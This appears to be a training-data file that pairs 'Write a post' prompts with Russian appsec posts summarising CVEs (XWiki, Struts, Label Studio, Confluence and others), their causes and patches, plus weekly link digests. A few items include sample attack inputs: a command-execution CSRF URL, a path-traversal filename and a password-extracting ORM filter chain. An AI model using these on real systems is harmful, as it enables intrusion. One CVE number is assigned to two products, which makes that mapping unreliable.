Write a post on the following topic,Уязвимость выполнения кода в XWiki через VTL-шаблоны,"CVE-CVE-2023-37909 , обнаруженная в вики-платформеXWikiдо версий14.10.8и15.3-rc-1, может приводить к выполнению кода путем создания уникального объекта классаUIExtensionClassв соответствующем редакторе. Проблема заключается в попадании пользовательских данных в функции обработки VTL-шаблонов. Впатчедля пользовательских данных добавили функциюescapetool.xml(), которая заменяет символы&""<>'{на их числовые коды (&"<>'{), что предотвращает добавление дополнительных VTL-сущностей в шаблон." Write a post on the following topic,Уязвимость DoS в Werkzeug до версии 3.0.1,"CVE-CVE-2023-46136 в WSGI веб-фреймворкеWerkzeugдо версии3.0.1может приводить к отказу в обслуживании (DoS). Уязвимость локализована в обработке загружаемых файлов, при которой для файла, начинающегося с управляющих символов: возврата каретки (CR) или перевода строки (LF), следует большое количество данных без этих же управляющих символов, то поиск строкиboundaryвыполняется в постоянно растущем буфере, что и приводит к неограниченному потреблению вычислительных ресурсов. Разработчики висправлениидобавили корректировку указателя на конец данных при отсутствии частиboundaryв составе принятых данных." Write a post on the following topic,Уязвимость HTTP Request Smuggling в системе F5 BIG-IP.,"CVE-CVE-2023-46747 в системеF5 BIG-IPдо версий17.1.0.3.0.75.4, 16.1.4.1.0.50.5, 15.1.10.2.0.44.2, 14.1.5.6.0.10.6 и 13.1.5.1.0.20.2позволяет ""подделывать"" http-запросы к AJP серверу с помощью эксплуатации HTTP Request Smuggling. Уязвимость схожа сCVE-2022-26377, в которой нарушается логика проверки запроса при выставлении значения заголовка ""Transfer-Encoding"" в ""chunked, chunked"", что позволяет добавить ""контрабандный"" запрос к обычному, т.к. длина и контент запроса контролируются пользователем. Более подробный разбор можно посмотреть поссылке." Write a post on the following topic,SQL-инъекция в Netentsec NS-ASG до версии 6.3,"CVE-CVE-2023-5700 в продукте для безопасного доступаNetentsec NS-ASGдо версии6.3включительно может приводить к SQL-инъекции. Данные из параметра ""jsoncontent"" POST-запроса без соответствующей проверки передаются в функциюdb_query, что позволяет атакующему встроить SQL-инъекцию в тело запроса и выполнить его." Write a post on the following topic,Уязвимость CVE-2023-46119 в Parse Server приводит к DoS.,"CVE-CVE-2023-46119 в бэкенд-фреймворкеParse Serverдо версий5.5.6 и 6.3.1может приводить к DoS. Уязвимость заключается в том, что для переменной ""extension"" со значениемundefinedпоследующий вызов методаsplit()вызовет исключение, приводящее к аварийному завершению приложения.Исправлениесвязано с использованием оператора опциональной последовательности (?.) для формирования значения ""extension"", что позволяет обрабатывать значениеundefinedбез выдачи исключения." Write a post on the following topic,Уязвимость в openCRX до версии 5.3.0 связанная с чтением локальных файлов и SSRF из-за неправильного использования XML external entity.,"CVE-CVE-2023-46502 , обнаруженная в CRMopenCRXдо версии5.3.0, может приводить кчтению локальных файлов и SSRF. Уязвимость заключается в использовании инстанса ""javax.xml.parsers.DocumentBuilderFactory"" без выставленных флагов, предотвращающих возможность использовать XML external entity. Впатчебыли добавлены настройки безопасности:- запрет объявления DOCTYPE ""http://apache.org/xml/features/disallow-doctype-decl"";- запрет на включение общих внешних сущностей ""http://xml.org/sax/features/external-general-entities"";- запрет на включение объектов внешних параметров или части внешнего DTD ""http://xml.org/sax/features/external-parameter-entities"";- полное игнорирование внешнего DTD ""http://apache.org/xml/features/nonvalidating/load-external-dtd""." Write a post on the following topic,Уязвимость SSRF в приложении FoodCoopShop до версии 3.6.1,"CVE-CVE-2023-46725 в приложенииFoodCoopShopдо версии3.6.1может приводить кSSRF. Уязвимость заключается в формирования http-запросов на внешние ресурсы без контроля значения на принадлежность к ""белому"" списку. Висправлениивведена дополнительная проверка на содержании доменного имени http-запроса в ""белом"" списке доменов." Write a post on the following topic,Уязвимость Prototype Pollution в библиотеке dot-diver до версии 1.0.2,"CVE-CVE-2023-45827 , обнаруженная в TypeScript библиотекеdot-diverдо версии1.0.2,может приводить кPrototype Pollution. Отсутствие проверок на свойство ""proto"" в функции ""setByPath"" приводит к появлению уязвимости.Патчдобавил проверку (""Object.prototype.hasOwnProperty"") на существование свойства в объекте до его присвоения." Write a post on the following topic,"Уязвимость XSS в ""Pimcore Admin Classic Bundle"" до версии 1.2.0","CVE-CVE-2023-46722 в UI-бэкенде ""Pimcore Admin Classic Bundle"" до версии1.2.0может приводить кXSS. Уязвимость заключается в возможности исполненияjavascriptиз составаpdfдокументана стороне клиента. В исправлениях (commitиPR) добавили проверку на содержание js контента в pdf и блокирование отображения pdf-документа с js-кодом внутри." Write a post on the following topic,High-risk vulnerabilities in Confluence Data Center and Server and Bitrix24,"CVE-CVE-2023-22515 ,CVE-2023-22518вConfluence Data Center and Serverявляются уязвимостями с высоким уровнем опасности, которые позволяют сбросить настройки Confluence и создать аккаунт неавторизованного администратора. Обладая полными правами доступа нарушитель способен выполнить любые действия. Позаявлениюразработчиков версии с исправлением уязвимостей являются7.19.16, 8.3.4, 8.4.4, 8.5.3, 8.6.1. Основными рекомендациями являются обновление версий до неуязвимых, отключение уязвимого Confluence от внешнего доступа. Как временная мера приводится рекомендация блокирования с уже известными векторами атак следующих точек доступа :-/json/setup-restore.action;-/json/setup-restore-local.action;-/json/setup-restore-progress.action.🐛 В продуктеBitrix24до версии22.0.300были раскрыты множественные уязвимости позволяющие:- RCE на стороне сервера (CVE-2023-1713,CVE-2023-1714);- XSS на стороне клиента (CVE-2023-1715,CVE-2023-1716,CVE-2023-1717,CVE-2023-1720);- DoS на стороне сервера (CVE-2023-1718);- внешний доступ к переменным окружения (CVE-2023-1719).Уязвимости имеют высокий уровень опасности, что требует срочного обновления инстансов Bitrix24. Подробные разборы приведены по следующим ссылкам -CVE-2023-1713,CVE-2023-1714,CVE-2023-1715 & CVE-2023-1716,CVE-2023-1717,CVE-2023-1718,CVE-2023-1719иCVE-2023-1720." Write a post on the following topic,Обзор наиболее интересных публикаций по аппсеку за прошедшую неделю.,"📌Наиболее интересные публикации по аппсеку за прошедшую неделю📰Самыегромкие атаки и наиболее заметные утечки от🟥📰 Очереднаячастьцикла статей «Выдающиеся программисты 21-го века», посвящённая Ральфу Мерклу, чьё имя известно куда меньшему количеству людей, по сравнению с его работами.📰Разборнабирающей обороты волны атак на CVE-2023-22518 (недостаточная авторизация в Atlassian Confluence). Здесь также стоит обратить внимание наразбор«соседней» уязвимости в том же продукте.📰Обзормеханизмов и проблем безопасности редактора VSCode «от создателей SonarQube».📰 Внушительнаястатьяот Брюса Шнайера (на правах соавтора) о принципе «развязки» (decoupling) в современных системах.📰 Втораячастьрайтапа от участников Pwn2Own об атаках на Netgear RAX30.📰Исследованиеот Aquasec о методах переобнаружения уязвимостей в opensource-проектах на ранних этапах их существования.📰РазборCVE-2023-32782 (OS Commanding в PRTG и Dicom C-ECHO sensor).📰 Вводнаястатьяоб управлении секретами в рамках CI/CD.📰Обзорrecon-фреймворка OWASP Nettacker." Write a post on the following topic,"Уязвимость в CRM Group-Office, позволяющая чтение локальных файлов и SSRF.","CVE-CVE-2023-46730 ,обнаруженная в CRMGroup-Officeдо версий6.8.15,6.7.54и6.6.177,может приводить к чтению локальных файлов и SSRF. Уязвимость заключается в возможности атакующим задавать путь к файлу через схему ""file://"" при загрузке файлов. Это обеспечивается использованием функции ""$httpClient->download"", которая реализует загрузку файлов с удаленных источников. Впатчебыла исключена функциональность загрузки файлов из сторонних ресурсов." Write a post on the following topic,Уязвимость повышения привилегий в Label Studio до версии 1.8.2 из-за захардкоженного SECRET_KEY.,"CVE-CVE-2023-43791 в приложенииLabel Studioдо версии1.8.2может использоваться для повышения привилегий. Уязвимость заключается в использовании захардкоженного секрета ""SECRET_KEY"", участвующего в формировании и валидации пользовательских сессий. Атакующий, зная данный секрет и хеш пользовательского пароля, получает возможность формировать легитимную сессионную куку. Висправленииразработчики добавили функцию ""generate_key_if_missing"", которая обеспечивает контроль наличия секрета при старте приложения, а при отсутствии его генерацию, используябиблиотечную функцию Django ""django.core.management.utils.get_random_secret_key""." Write a post on the following topic,Уязвимость XSS в PHP-фреймворке Symfony из-за отсутствия санитизации данных.,"CVE-CVE-2023-46734 ,обнаруженная в PHP-фреймворкеSymfonyдо версий4.4.51,5.4.31и6.3.8может приводить кXSS. Появлению уязвимости способствовало отсутствие санитизации пользовательских данных в обработчиках фильтров: ""abbr_class"", ""abbr_method"", ""format_args"", ""format_args_as_text"", ""format_file"" и ""format_file_from_text"" темплейт-движка Twig в связке с опцией ""is_safe=html"". Впервомивторомпатчах были добавлены функции ""htmlspecialchars"" с флагами ""ENT_COMPAT"" и ""ENT_SUBSTITUTE"", которые преобразуют символы'&""<>в их html-мнемоники ("&'<>)." Write a post on the following topic,SQL инъекция в ORM библиотеке Piccolo до версии 1.1.1,"CVE-CVE-2023-46722 в ORM библиотекеPiccoloдо версии1.1.1может приводить к SQL инъекции. Уязвимость заключается в возможности изменения SQL-запроса через значение имени точки сохранения при формировании транзакций с SQL-оператором SAVEPOINT. Висправлениибыла добавлена валидирующая функция ""validate_savepoint_name"", в которой проверяется наличие символов из значения имени в ""белом списке"" (string.ascii_letters + string.digits + ""-"" + ""_"")." Write a post on the following topic,Эксплуатация CSRF уязвимости в XWiki для исполнения Groovy-макросов,"CVE-CVE-2023-46242 обнаруженная в вики-платформеXWikiдо версий14.10.7и15.2RC1может приводить к исполнению Groovy-макросов через эксплуатациюCSRFна пользовательской стороне. Уязвимости подвержен эндпойнт ""/xwiki/bin/edit/Main/"" для пользователей с правами на разработку и для которого отсутствует механизма защиты от CSRF атак. Впатчебыла добавлена проверка с использованием встроенного в XWiki механизма формирования и валидации CSRF токенов (класс ""org.xwiki.csrf.CSRFToken"")." Write a post on the following topic,Обзор последних новостей и анализ в области кибербезопасности,"📌 Наиболее интересные публикации по аппсеку за прошедшую неделю📰Обзоризменений новой версии Wireshark 4.20.📰Введениев атаки E-mail Injection.📰 ДетальныйразборCVE-2023-47444 (Code Injection в OpenCart)📰Разбортехник атаки на CVE-2023-46604 (RCE в ActiveMQ)📰Статьяо весьма пикантном сценарии использования Flipper Zero😳📰 Заключительная,третьячасть цикла статей о безопасности VS Code.📰Райтаппроблем безопасности шэринговых сервисов глазами баг-хантера." Write a post on the following topic,Возможность извлечения конфиденциальной информации через манипулирование фильтрами ORM Django в приложении Label Studio.,"CVE-CVE-2023-47117 , обнаруженная в приложенииLabel Studioдо версии1.9.2post0, может приводить к получению конфиденциальной информации через манипулирование фильтрами ORM Django. Уязвимость заключается в возможности пользователям задавать фильтры для отображения проектов (например, ""updated_by__active_organization""). Атакующий может создать цепочку фильтров (например, ""updated_by__active_organization__active_users__password"") и извлечь конфиденциальные данные пользователей.Патчдобавляет проверку значений фильтра по ""белому"" списку." Write a post on the following topic,Уязвимость в библиотеке ImageMagick связанная с обработкой BMP-файлов,"CVE-CVE-2023-5341 в библиотекеImageMagickдо версии7.1.2может приводить к проблеме использования памяти после освобождения. Уязвимость заключается в неконтролируемом размереbmp-файла, который подлежит обработке. Висправлениибыло добавлено сравнение размера файла, указанного в ""bmp_info.file_size"", с фактическим размером данных." Write a post on the following topic,Уязвимость XSS в системе мониторинга сети LibreNMS до версии 23.11.0,"CVE-CVE-2023-48295 , обнаруженная в системе мониторинга сетиLibreNMSдо версий23.11.0,может приводить кXSS. Уязвимость связана с формированием имен групп устройств (""$deviceGroup->name"") с использованием пользовательских данных, которые в дальнейшем попадают в состав ответа сервера. Впатчебыла добавлена функция ""htmlentities"", которая преобразует опасные символы""&'<>в их html-мнемоники ("&'<>)." Write a post on the following topic,Уязвимость SQL-инъекции в Pimcore до версии 11.1.1,"CVE-CVE-2023-47637 , обнаруженная в платформе для менеджментаPimcoreдо версии11.1.1,может приводить кSQL-инъекции. К уязвимости приводило попадание пользовательских данных в состав SQL запроса в функции ""getFilterConditionExt"". Впатчебыла добавлена функции ""$db->quote"" для экранирования специальных символов и ""Helper::escapeLike"" для корректного формирования запроса с оператором ""LIKE""." Write a post on the following topic,Уязвимость RCE в Netgate pfSense версии до 2.7.1,"CVE-CVE-2023-42326 вNetgate pfSenseдо версии2.7.1может приводить к RCE через внедрение команд. Уязвимость заключается в попадании имен интерфейсов, формируемых из пользовательских данных, в функцию исполнения шелл команд. В исправлении добавили сравнение имен интерфейсов с регулярным выражением ""/^gif[0-9]+$/"" для исключения внедрения недопустимых символов." Write a post on the following topic,Уязвимость в XWiki Admin Tools позволяющая выполнение произвольного кода,"CVE-CVE-2023-48292 , обнаруженная в приложенииXWiki Admin Toolsдо версии4.5.1, может приводить к исполнению произвольного кода. Уязвимость заключается возможности запуска системных команд на эндпойнте/xwiki/bin/view/Admin/RunShellCommandбез проверки CSRF-токена. Атакующий может сформировать ссылку, для которой будет исполнена произвольная команда с административными правами (например,/xwiki/bin/view/Admin/RunShellCommand?command=touch%20/tmp/pwned).Патчдобавляет функциональность генерации/валидации CSRF-токенов с помощью функции ""services.csrf.isTokenValid""." Write a post on the following topic,Уязвимость аутентификации в ownCloud до версии 10.13.1,"CVE-CVE-2023-48712 вownCloudдо версии10.13.1может приводить к обходу процесса аутентификации. Уязвимость заключается в возможности использования пустой строки для значения ""signing-key"" в качестве соли для функции формирования ключа ""hash_pbkdf2"". Висправлениидобавили проверку заполненности значения переменной ""$signingKey"" в функции ""verifySignature""." Write a post on the following topic,"Уязвимость CVE-2023-48699 в библиотеке fastbots, позволяющая исполнение произвольного Python кода.","CVE-CVE-2023-48699 в библиотекеfastbotsдо версии0.1.5может приводить к исполнению произвольного Python кода. Уязвимость заключается в возможности исполнения через функцию ""eval"" данных, поступающих из файла ""locators.ini"". Атакующий может подменить файл ""locators.ini"" с измененной директивой ""locator_name"", включающей в себя произвольный Python код. Висправлениибыло исключено попадание пользовательских данных в функцию ""eval""." Write a post on the following topic,Уязвимость Prototype Pollution в библиотеке sequelize-typescript,"CVE-CVE-2023-6293 , обнаруженная в библиотекеsequelize-typescriptдо версий2.1.6, может приводить кPrototype Pollution. Уязвимость связана с возможностью в функции ""deepAssign"" резолвинга атрибута объекта как прототипа объекта . Впатчебыла добавлена проверка по ""черному"" списку имен атрибутов (['proto', 'constructor', 'prototype'])." Write a post on the following topic,Уязвимость авторизации в Pimcore до версии 11.1.1,"CVE-CVE-2023-48228 , обнаруженная в платформе для менеджментаPimcoreдо версии11.1.1, может приводить к обходу процесса авторизации. К уязвимости приводила ошибка логики - проверка параметра PKCE ""code_verifier"" в процессе валидации токена проходила даже при его отсутствии, что делает ""Proof Key for Code Exchange"" неэффективным. Впатчебыла добавлена проверка на существование ""code_verifier"" и при его отсутствии срабатывает исключение ""TokenError""." Write a post on the following topic,XSS уязвимость в онлайн редакторе изображений minipaint,"CVE-CVE-2023-6461 описывает уязвимостьXSS(Cross-Site Scripting) для онлайн редактора изображенийminipaint до версии 4.14.0. Уязвимость позволяла вставлять и выполнять произвольный JavaScript-код на стороне клиента, когда пользователь взаимодействовал с определёнными элементами интерфейса. Впатчебыло реализовано экранирование пользовательских данных с использованием функцииHelper.escapeHtml, которая выполняет преобразование символов&, <, >, "", 'в их html-мнемоники (&<>"')." Write a post on the following topic,"Уязвимость RCE в Chamilo LMS до версии 1.11.20, CVE-2023-3368.","CVE-CVE-2023-3368 , обнаруженная в системе управления обучениемChamilo LMS до версии 1.11.20, позволяет выполнить произвольный код (RCE). Уязвимость связана с возможностью исполнения кода в скриптеadditional_webservices.phpи является обходом предыдущей уязвимостиCVE-2023-34960.Исправлениевключает использование функцииescapeshellargдля корректной обработки параметров и проверку на наличие подстроки`..`в имени файла, чтобы предотвратить возможные попытки выхода за пределы директории." Write a post on the following topic,Уязвимость Cross-Site Scripting в веб-приложении dpaste.,"CVE-CVE-2023-49277 приводит кCross-Site Scriptingв веб-приложенииdpaste до версии 3.8, которое используется для обмена текстовыми фрагментами кода. Уязвимость связана с обработкой ошибок и формированием ответа, содержащего пользовательские данные. Висправленииразработчики добавили использование функцииescapeиз фреймворкаDjangoдля экранирования входных данных, что предотвращает выполнение вредоносного кода." Write a post on the following topic,Уязвимость в Foxit Reader позволяющая создать и исполнить вредоносный файл,"CVE-CVE-2023-35985 , обнаруженная вFoxit Reader до версии 12.1.3.15356, позволяет создавать произвольный вредоносный файл с возможностью его дальнейшего исполнения. Уязвимость возможна в результате использования функции API JavaScriptexportDataObject. Более детальное разбор приведен поссылке." Write a post on the following topic,Уязвимость XSS в Uptime Kuma до версии 1.23.7,"CVE-CVE-2023-49276 связана с уязвимостью вUptime Kuma до версии 1.23.7 -инструмент для мониторинга, который позволяет интегрировать Google Analytics. Проблема заключалась в том, что идентификаторtagID, из состава недоверенных данных, участвовал в формировании ответа для пользователя, что приводило кXSS. Разработчикиисправилиуязвимость через экранированиеtagIDв контексте HTML-атрибута, используя функциюhtml-escaper." Write a post on the following topic,Уязвимость в XWiki Change Request позволяет получить хэш пароля пользователя.,"CVE-CVE-2023-49280 , обнаруженная в приложенииXWiki Change Requestдо версии 1.10, позволяет нарушителю получить хэш пароля пользователя, выполнив редактирование профилей пользователей и скачав созданный XML-файл. Висправленииразработчики добавили функцию контроля прав на редактирование страницыisEditWithChangeRequestAllowedи функциюisObjectContainingPassword, в которой проверяют наличие пароля в формируемой странице. И при наличии пароля выдается исключение." Write a post on the following topic,"Уязвимость в программе Squid до версии 6.5, приводящая к denial-of-service.","CVE-CVE-2023-49286 - уязвимость в программе кэширующего прокси-сервераSquid до версии 6.5, которая может приводить кdenial-of-service (DoS). Проблема связана с ошибкой в проверке файловых дескрипторовcrfd,cwfd,debug_logпри обработке процессаHelper. Впатчебыла добавлена функция контроляdupOrExitc вызовом исключения при отрицательном результате проверки." Write a post on the following topic,Уязвимость XSS в GitHub репозитории mlflow/mlflow версии 2.9.0.,CVE-CVE-2023-6568 относится к уязвимостиCross-site Scripting (XSS)в репозиторииGitHub mlflow/mlflow версии 2.9.0. Уязвимость заключается во включении содержимого заголовка'Content-Type'в состав формируемогоresponseпри уведомлении об ошибке . Висправленииисключили участие заголовка запроса в формированииresponse. Write a post on the following topic,"Уязвимости в Confluence и WordPress, приводящие к удаленному выполнению кода (RCE).","CVE-CVE-2023-22522 , обнаруженная вConfluence Data Server до версий 7.19.1, 8.4.5, 8.5.4 и в Confluence Data Center до версий 8.6.2 и 8.7.1, приводит кRCE. проблема возникает из-за уязвимостиTemplate Injection, которая позволяет нарушителю, включая с правами анонимного доступа, встроить инъекцию внутрь Confluence страницы. Более подробную информацию можно посмотреть в бюллетене безопасности поссылке.🐛 Критическая уязвимость вWordPress версиях 6.4-6.4.1, потенциально приводящая кRemote Code Execution. Уязвимость связана с классомWP_HTML_Tokenи функцией__destruct, которая является ""магическим"" методом и автоматически вызывается PHP при высвобождении объекта. В исправлении разработчики добавили в классWP_HTML_Tokenдругой ""магический"" метод__wakeup, внутри которого вызывается исключение, что предотвращает возможную реализацию атаки черезObject Injection. Детальная информация по уязвимости приведена встатье." Write a post on the following topic,"""Обзор актуальных тем в области кибербезопасности и криптографии""","📌 Наиболее интересные публикации за прошедшую неделю📰Введениев работу с WPScan. На фоне последних CVE в плагинах Wordpress может быть актуально.📰 Вышла новая версияCryptolyzer— анализатора настроек множества протоколов, использующих криптографию.📰Разборвымогателя Rhysida.📰 Беглыйобзортехник, используемых Google для защиты прошивок сотовых модулей в Android.📰РазборCVE-2023-22518 (байпасс аутентификации в Confluence).📰 Втораячастьцикла статей, посвящённого истории криптографии.📰 Любопытнаястатьяоб опыте скрещивания языковых моделей с Syzkaller.📰 Внезапно, Log4Shell всё ещёактуальнана реальных системах.📰Планпогружения в сферу инфобеза от Яндекс Практикума.📰 Достаточно емкийобзоргенераторов случайных чисел. Список литературы заслуживает отдельного внимания.📰 Краткоеописаниезабавной CVE-2023-24893 (OS Commanding в VSCode).📰 Свыше 100форковзаведомо уязвимых приложений на различных языках и стеках." Write a post on the following topic,Наиболее интересные публикации о безопасности и уязвимостях в IT.,"📌Наиболее интересные публикации за прошедшую неделю📰 Достаточно подробныйгайдпо анализу безопасности GraphQL-приложений.📰 Перваячастьцикла статей, описывающих принципы работы виртуальных машин на примере VMProtect.📰 Исчерпывающийгайдпо атакам SMTP Smuggling.📰 Введениев написание шаблонов для SemGrep.📰Плагинк IDA, позволяющий осуществлять поиск в бинарниках посредством выполнения запросов.📰 Введениев фаззинг с помощью LibFuzzer.Астрологи объявили неделю CVE. Количество разборов увеличилось вдвое.📰CVE-2023-42793(RCE в JetBrains TeamCity).📰CVE-2023-6483(недостаточная аутентификация в ADiTaaS).📰CVE-2023-50164(загрузка произвольных файлов в Apache Struts). А такжеproof-of-concept.📰CVE-2023-47271(RCE в PKP-WAL)." Write a post on the following topic,Уязвимость Path Traversal в платформе разработки Machine Learning.,"CVE-CVE-2023-6753 , обнаруженная в платформе разработкиMachine Learning до версии 2.9.2, приводит к уязвимостиPath Traversal. Проблема заключалась в использовании функцииposixpath.basename, в которой не учитывался символ""\"", извлекаемый из URL. Эта особенность позволяла нарушителю манипулировать путем к файлу в ОС Windows. Висправлениибыла заменена функцияposixpath.basenameнаos.path.basename, которая уже обрабатывает символы""\""и""/""одинаковым образом." Write a post on the following topic,Уязвимость в Uptime Kuma позволяющая сохранять доступ без выхода из системы после изменения пароля.,"CVE-CVE-2023-49804 , выявленная в инструменте мониторингаUptime Kuma до версий 1.3.3 и 1.23.9,которая позволяет злоумышленнику получить несанкционированный доступ к учетным записям пользователей. Уязвимость давала возможность авторизованным пользователь сохранять доступ без выхода из системы даже после изменения пароля. Впатчепри сбросе и изменении пароля выполняется вызов функцииdisconnectAllSocketClients, которая выполняет разрыв всех ранее установленных соединений." Write a post on the following topic,Vulnerability in GLPI asset and IT management package leading to arbitrary file upload.,"CVE-CVE-2023-46726 , обнаруженная в пакете для управления активами и информационными технологиямиGLPI до версии 10.0.11, приводит кArbitrary File Upload, с использованием формы конфигурации сервера LDAP. Дляисправлениядобавили функциюisFilepathSafe, которая проверяет схему и нормализует директорию." Write a post on the following topic,Уязвимость Buffer Overflow в Moonlight Game Streaming Project из-за использования функции sprintf,"CVE-CVE-2023-42799 , обнаруженная в одном из пакетовMoonlight Game Streaming Project, приводит к уязвимостиBuffer Overflow. Проблема заключается в небезопасном использовании функцииsprintf. Впатчеразработчики ввели контроль на размер данных и замели функциюsprintfна ее безопасный аналогsnprintf." Write a post on the following topic,Уязвимость Path Traversal в web-фреймворке Struts,"CVE-CVE-2023-50164 , обнаруженная в популярном web-фреймворкеStruts до версии 2.5.33 и6.3.0.2, приводит к потенциальномуPath Traversal. Уязвимость обусловлена недостаткомFileUploadInterceptorпри формировании значенийFileName, которое может содержать вредоносную нагрузку (например,..\..\..\..\..\..\attack.bin) из состава POST-запроса. Более детальную информацию по уязвимости можно посмотреть вобзоре." Write a post on the following topic,CVE-2024-21663: OS Command Injection в DiscordRecon до версии 0.0.8,"CVE-CVE-2024-21663 , обнаруженная в ботеDiscordRecon до версии 0.0.8, приводит кOS Command Injection. Проблема заключалась в попадании недоверенных данных в функциюsubprocess.Popen()в состав аргументов команды ""prips {argument}"". Висправлениибыла добавлена функция санитизации -CommandInjection.sanitizeInput, которая использует функцию экранированияshlex.quote()." Write a post on the following topic,Уязвимость в WordPress плагине Unofficial Mobile BankID Integration из-за функции unserialize(),"CVE-CVE-2023-51700 , выявленная в WordPress плагинеUnofficial Mobile BankID Integrationдо версии 1.0.1. Уязвимость обусловлена использованием функцииunserialize()над недоверенными данными, что может приводить кDeserialization of Untrusted Data. Впатчеисключили использование функций сериализации/десериализации и перешли на хранение данных в формате json." Write a post on the following topic,"Обнаруженная уязвимость (CVE-2023-52086) в PHP backend для resumable.js, приводящая к произвольной загрузке файлов.","CVE-CVE-2023-52086 , обнаруженная вPHP backend for resumable.js до версии 0.1.4, приводит кArbitrary File Upload. Дляисправлениядобавили функцию безопасного формирования имени файлаcreateSafeName(string $name), которая использует пакетOndrejVrto\FilenameSanitize\FilenameSanitize." Write a post on the following topic,Уязвимость SSRF в приложении Audiobookshelf,"CVE-CVE-2023-51665 , найденная в приложенииAudiobookshelf до версии 2.7.0, приводит к уязвимостиServer-Side Request Forgery (SSRF). Проблема заключается в формированииurlна основе пользовательских данных, что позволяло конструировать неразрешенные пути . Впатчеразработчики реализовали формирование пути с использованием классаURLи дополнительным контролем на принадлежность к разрешенной группе." Write a post on the following topic,Уязвимость Unrestricted File Upload в платформе разработки Machine Learning,"CVE-CVE-2023-6976 , в платформе разработкиMachine Learning до версии2.9.2, приводит кUnrestricted File Upload. Уязвимость обусловлена в обходе функции валидации и использовании пути, который поступает из пользовательских данных. Висправлениибыла изменена логика формирования пути к файлу, путем приведения пути к существующему (local_file_uri_to_path) и проверки на выход за границы каталога." Write a post on the following topic,HTTP Request Smuggling в сервере Puma,"CVE-CVE-2024-21647 , найденная в сервереPuma до версии 5.6.8 и 6.4.2, приводит кHTTP Request Smuggling. Опасное поведение возникает в процессе обработки частей запроса для механизмаchunked transfer encoding. Дляисправленияразработчики ограничили размерchunk headerиchunk extensions. Без этого ограничения атакующий мог неограниченно потреблять ресурсы ЦП и сети." Write a post on the following topic,Уязвимость XSS в шаблонизаторе Fiber,"CVE-CVE-2024-22199 , выявленная вшаблонизаторе для Fiber до версии 3.1.9, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена возможностью внедрения пользовательских данных при рендере шаблона без экранирования. Висправлениибыло внедрена настройка автоматического экранирования (autoescape=true) всех данных поступающих в шаблон." Write a post on the following topic,XXE-уязвимость в библиотеке fontTools Python,"CVE-CVE-2023-45139 , обнаруженная в Python библиотекеfontTools до версии 4.28.2 (включительно) и 4.43.0, приводит кXML External Entity Injection (XXE). Проблема заключалась в том, что атакующий может использовать External Entity в файле шрифта, содержащего SVG таблицу. Висправлениив функцииsubset_glyphs(), которая обрабатывает данные в SVG формате, в вызов методаetree.XMLParser()добавили параметрresolve_entities=False, запрещающий обрабатывать External Entity." Write a post on the following topic,SQL Injection в Nginx UI до версии v2.0.0.beta.9,"CVE-CVE-2024-22196 , обнаруженная вNginx UI до версии v2.0.0.beta.9, приводит кSQL Injection. Проблема находится в обработчикеOrderAndPaginate()и заключается во внедрении данных из запроса (параметрыorderиsort_by) без санитизации в SQL-запрос . Висправлениибыла реализована проверка параметров запросаorderиsort_byна принадлежность соответствующим “белым” спискам." Write a post on the following topic,Уязвимость Improper Access Control в GitLab,"CVE-CVE-2023-7028 , найденная вGitLab CE/EE версий от 16.1 до 16.1.6, от 16.2 до 16.2.9, от 16.3 до 16.3.7, от 16.4 до 16.4.5, от 16.5 до 16.5.6, от 16.6 до 16.6.4 и от 16.7 до 16.7.2, приводит кImproper Access Control, в результате чего появляется возможность отправки письма о сбросе пароля на электронной адрес непроверенной почты. Описание бюллетеня безопасности можно найти поссылке." Write a post on the following topic,Уязвимость в Mock с использованием Jinja2 для RCE,"CVE-CVE-2023-6395 , обнаруженная в программном обеспеченииMock, которая позволяет злоумышленнику использовать повышение привилегий дляRCE. Проблема заключалась в возможности исполнения кода при обработке шаблоновJinja2. Одним из вариантовисправленияпри подготовке шаблона для рендера предлагается использоватьjinja2.sandbox, которая позволяет перехватывать и ограничить доступ за пределы разрешенного окружения." Write a post on the following topic,Уязвимость XSS в фреймворке создания admin-панели AVO,"CVE-CVE-2024-22191 , найденная в фреймворке создания admin-панелиAVO до версии 2.47 и 3.3.0, приводит кCross-Site Scripting (XSS). При редактировании страницы проекта существует возможность внедренияpayloadатакующего, который будет встраиваться в код страницы при его дальнейшем отображении. Дляисправленияразработчики добавили функции санитизацииDOMPurify.sanitize()для полей, через которые была возможность встраиванияpayload." Write a post on the following topic,Обход аутентификации в Nextcloud Global Site Selector,"CVE-CVE-2024-22212 , выявленная вNextcloud Global Site Selector до версии 1.4.1, 2.1.2, 2.3.4 или 2.4.5, приводит к обходу аутентификации. Уязвимость обусловлена ошибкой в логике аутентификации пользователя, которая позволяла пользователю аутентифицироваться с пустым паролем. Висправлениибыла изменена логика проверки наличия пароля и при его отсутствии аутентификация не производится." Write a post on the following topic,CVE-2024-22419 приводит к Buffer Overflow в Vyper до версии 0.3.10,"CVE-CVE-2024-22419 , найденнаяв Vyper до версии 0.3.10 (включительно), приводит кBuffer Overflow. Дляисправленияразработчики ввели буфер ограниченной длины относительно максимально возможной." Write a post on the following topic,OGNL инъекция в Confluence ведет к удаленному выполнению кода,"CVE-CVE-2023-22527 , выявленная вConfluence Data Center and Server до версии 8.5.4 и Confluence Data Center до версии 8.6.0, 8.7.1, приводит кRemote Code Executionчерез инъекциюOGNL выражений. Описание бюллетеня безопасности можно найти поссылке. Детальный разбор уязвимости приведен в следующейстатье." Write a post on the following topic,"""повышение привилегий в Windows XAML diagnostics API""",CVE-CVE-2023-36003 (повышение привилегий в Windows XAML diagnostics API); Write a post on the following topic,"""RCE vulnerability in Mirth Connect""",CVE-CVE-2023-43208 (RCE в Mirth Connect); Write a post on the following topic,обход аутентификации в Fortra GoAnywhere,CVE-CVE-2024-0204 (обход аутентификации в Fortra GoAnywhere); Write a post on the following topic,"""Path traversal vulnerability in PaperCut""",CVE-CVE-2023-39143 (проход пути в PaperCut). Write a post on the following topic,Чтение произвольных файлов в Jenkins,CVE-CVE-2024-23897 (чтение произвольных файлов в Jenkins). Write a post on the following topic,Прототипное загрязнение в утилитах hoolock до версии 2.2.1,"CVE-CVE-2024-23339 , обнаруженная в наборе утилитhoolock до версии 2.2.1, приводит кPrototype Pollution. Проблема заключалась в том, что ряд функций позволяли изменять поля объектов, включая свойства прототипов. Висправлениипри установке значения для поля была добавлена функцияsetSafeProperty, которая проверяет наличие собственного поля у объекта с использованием функцииhasOwnProperty, и предотвращает установку поля у прототипа." Write a post on the following topic,CVE-CVE-2024-23345 XSS vulnerability in Nautobot,"CVE-CVE-2024-23345 , выявленная в платформеNautobot до версии 1.6.10 и 2.1.2,приводит кCross-site Scripting (XSS). Уязвимость обусловлена попаданием недоверенных 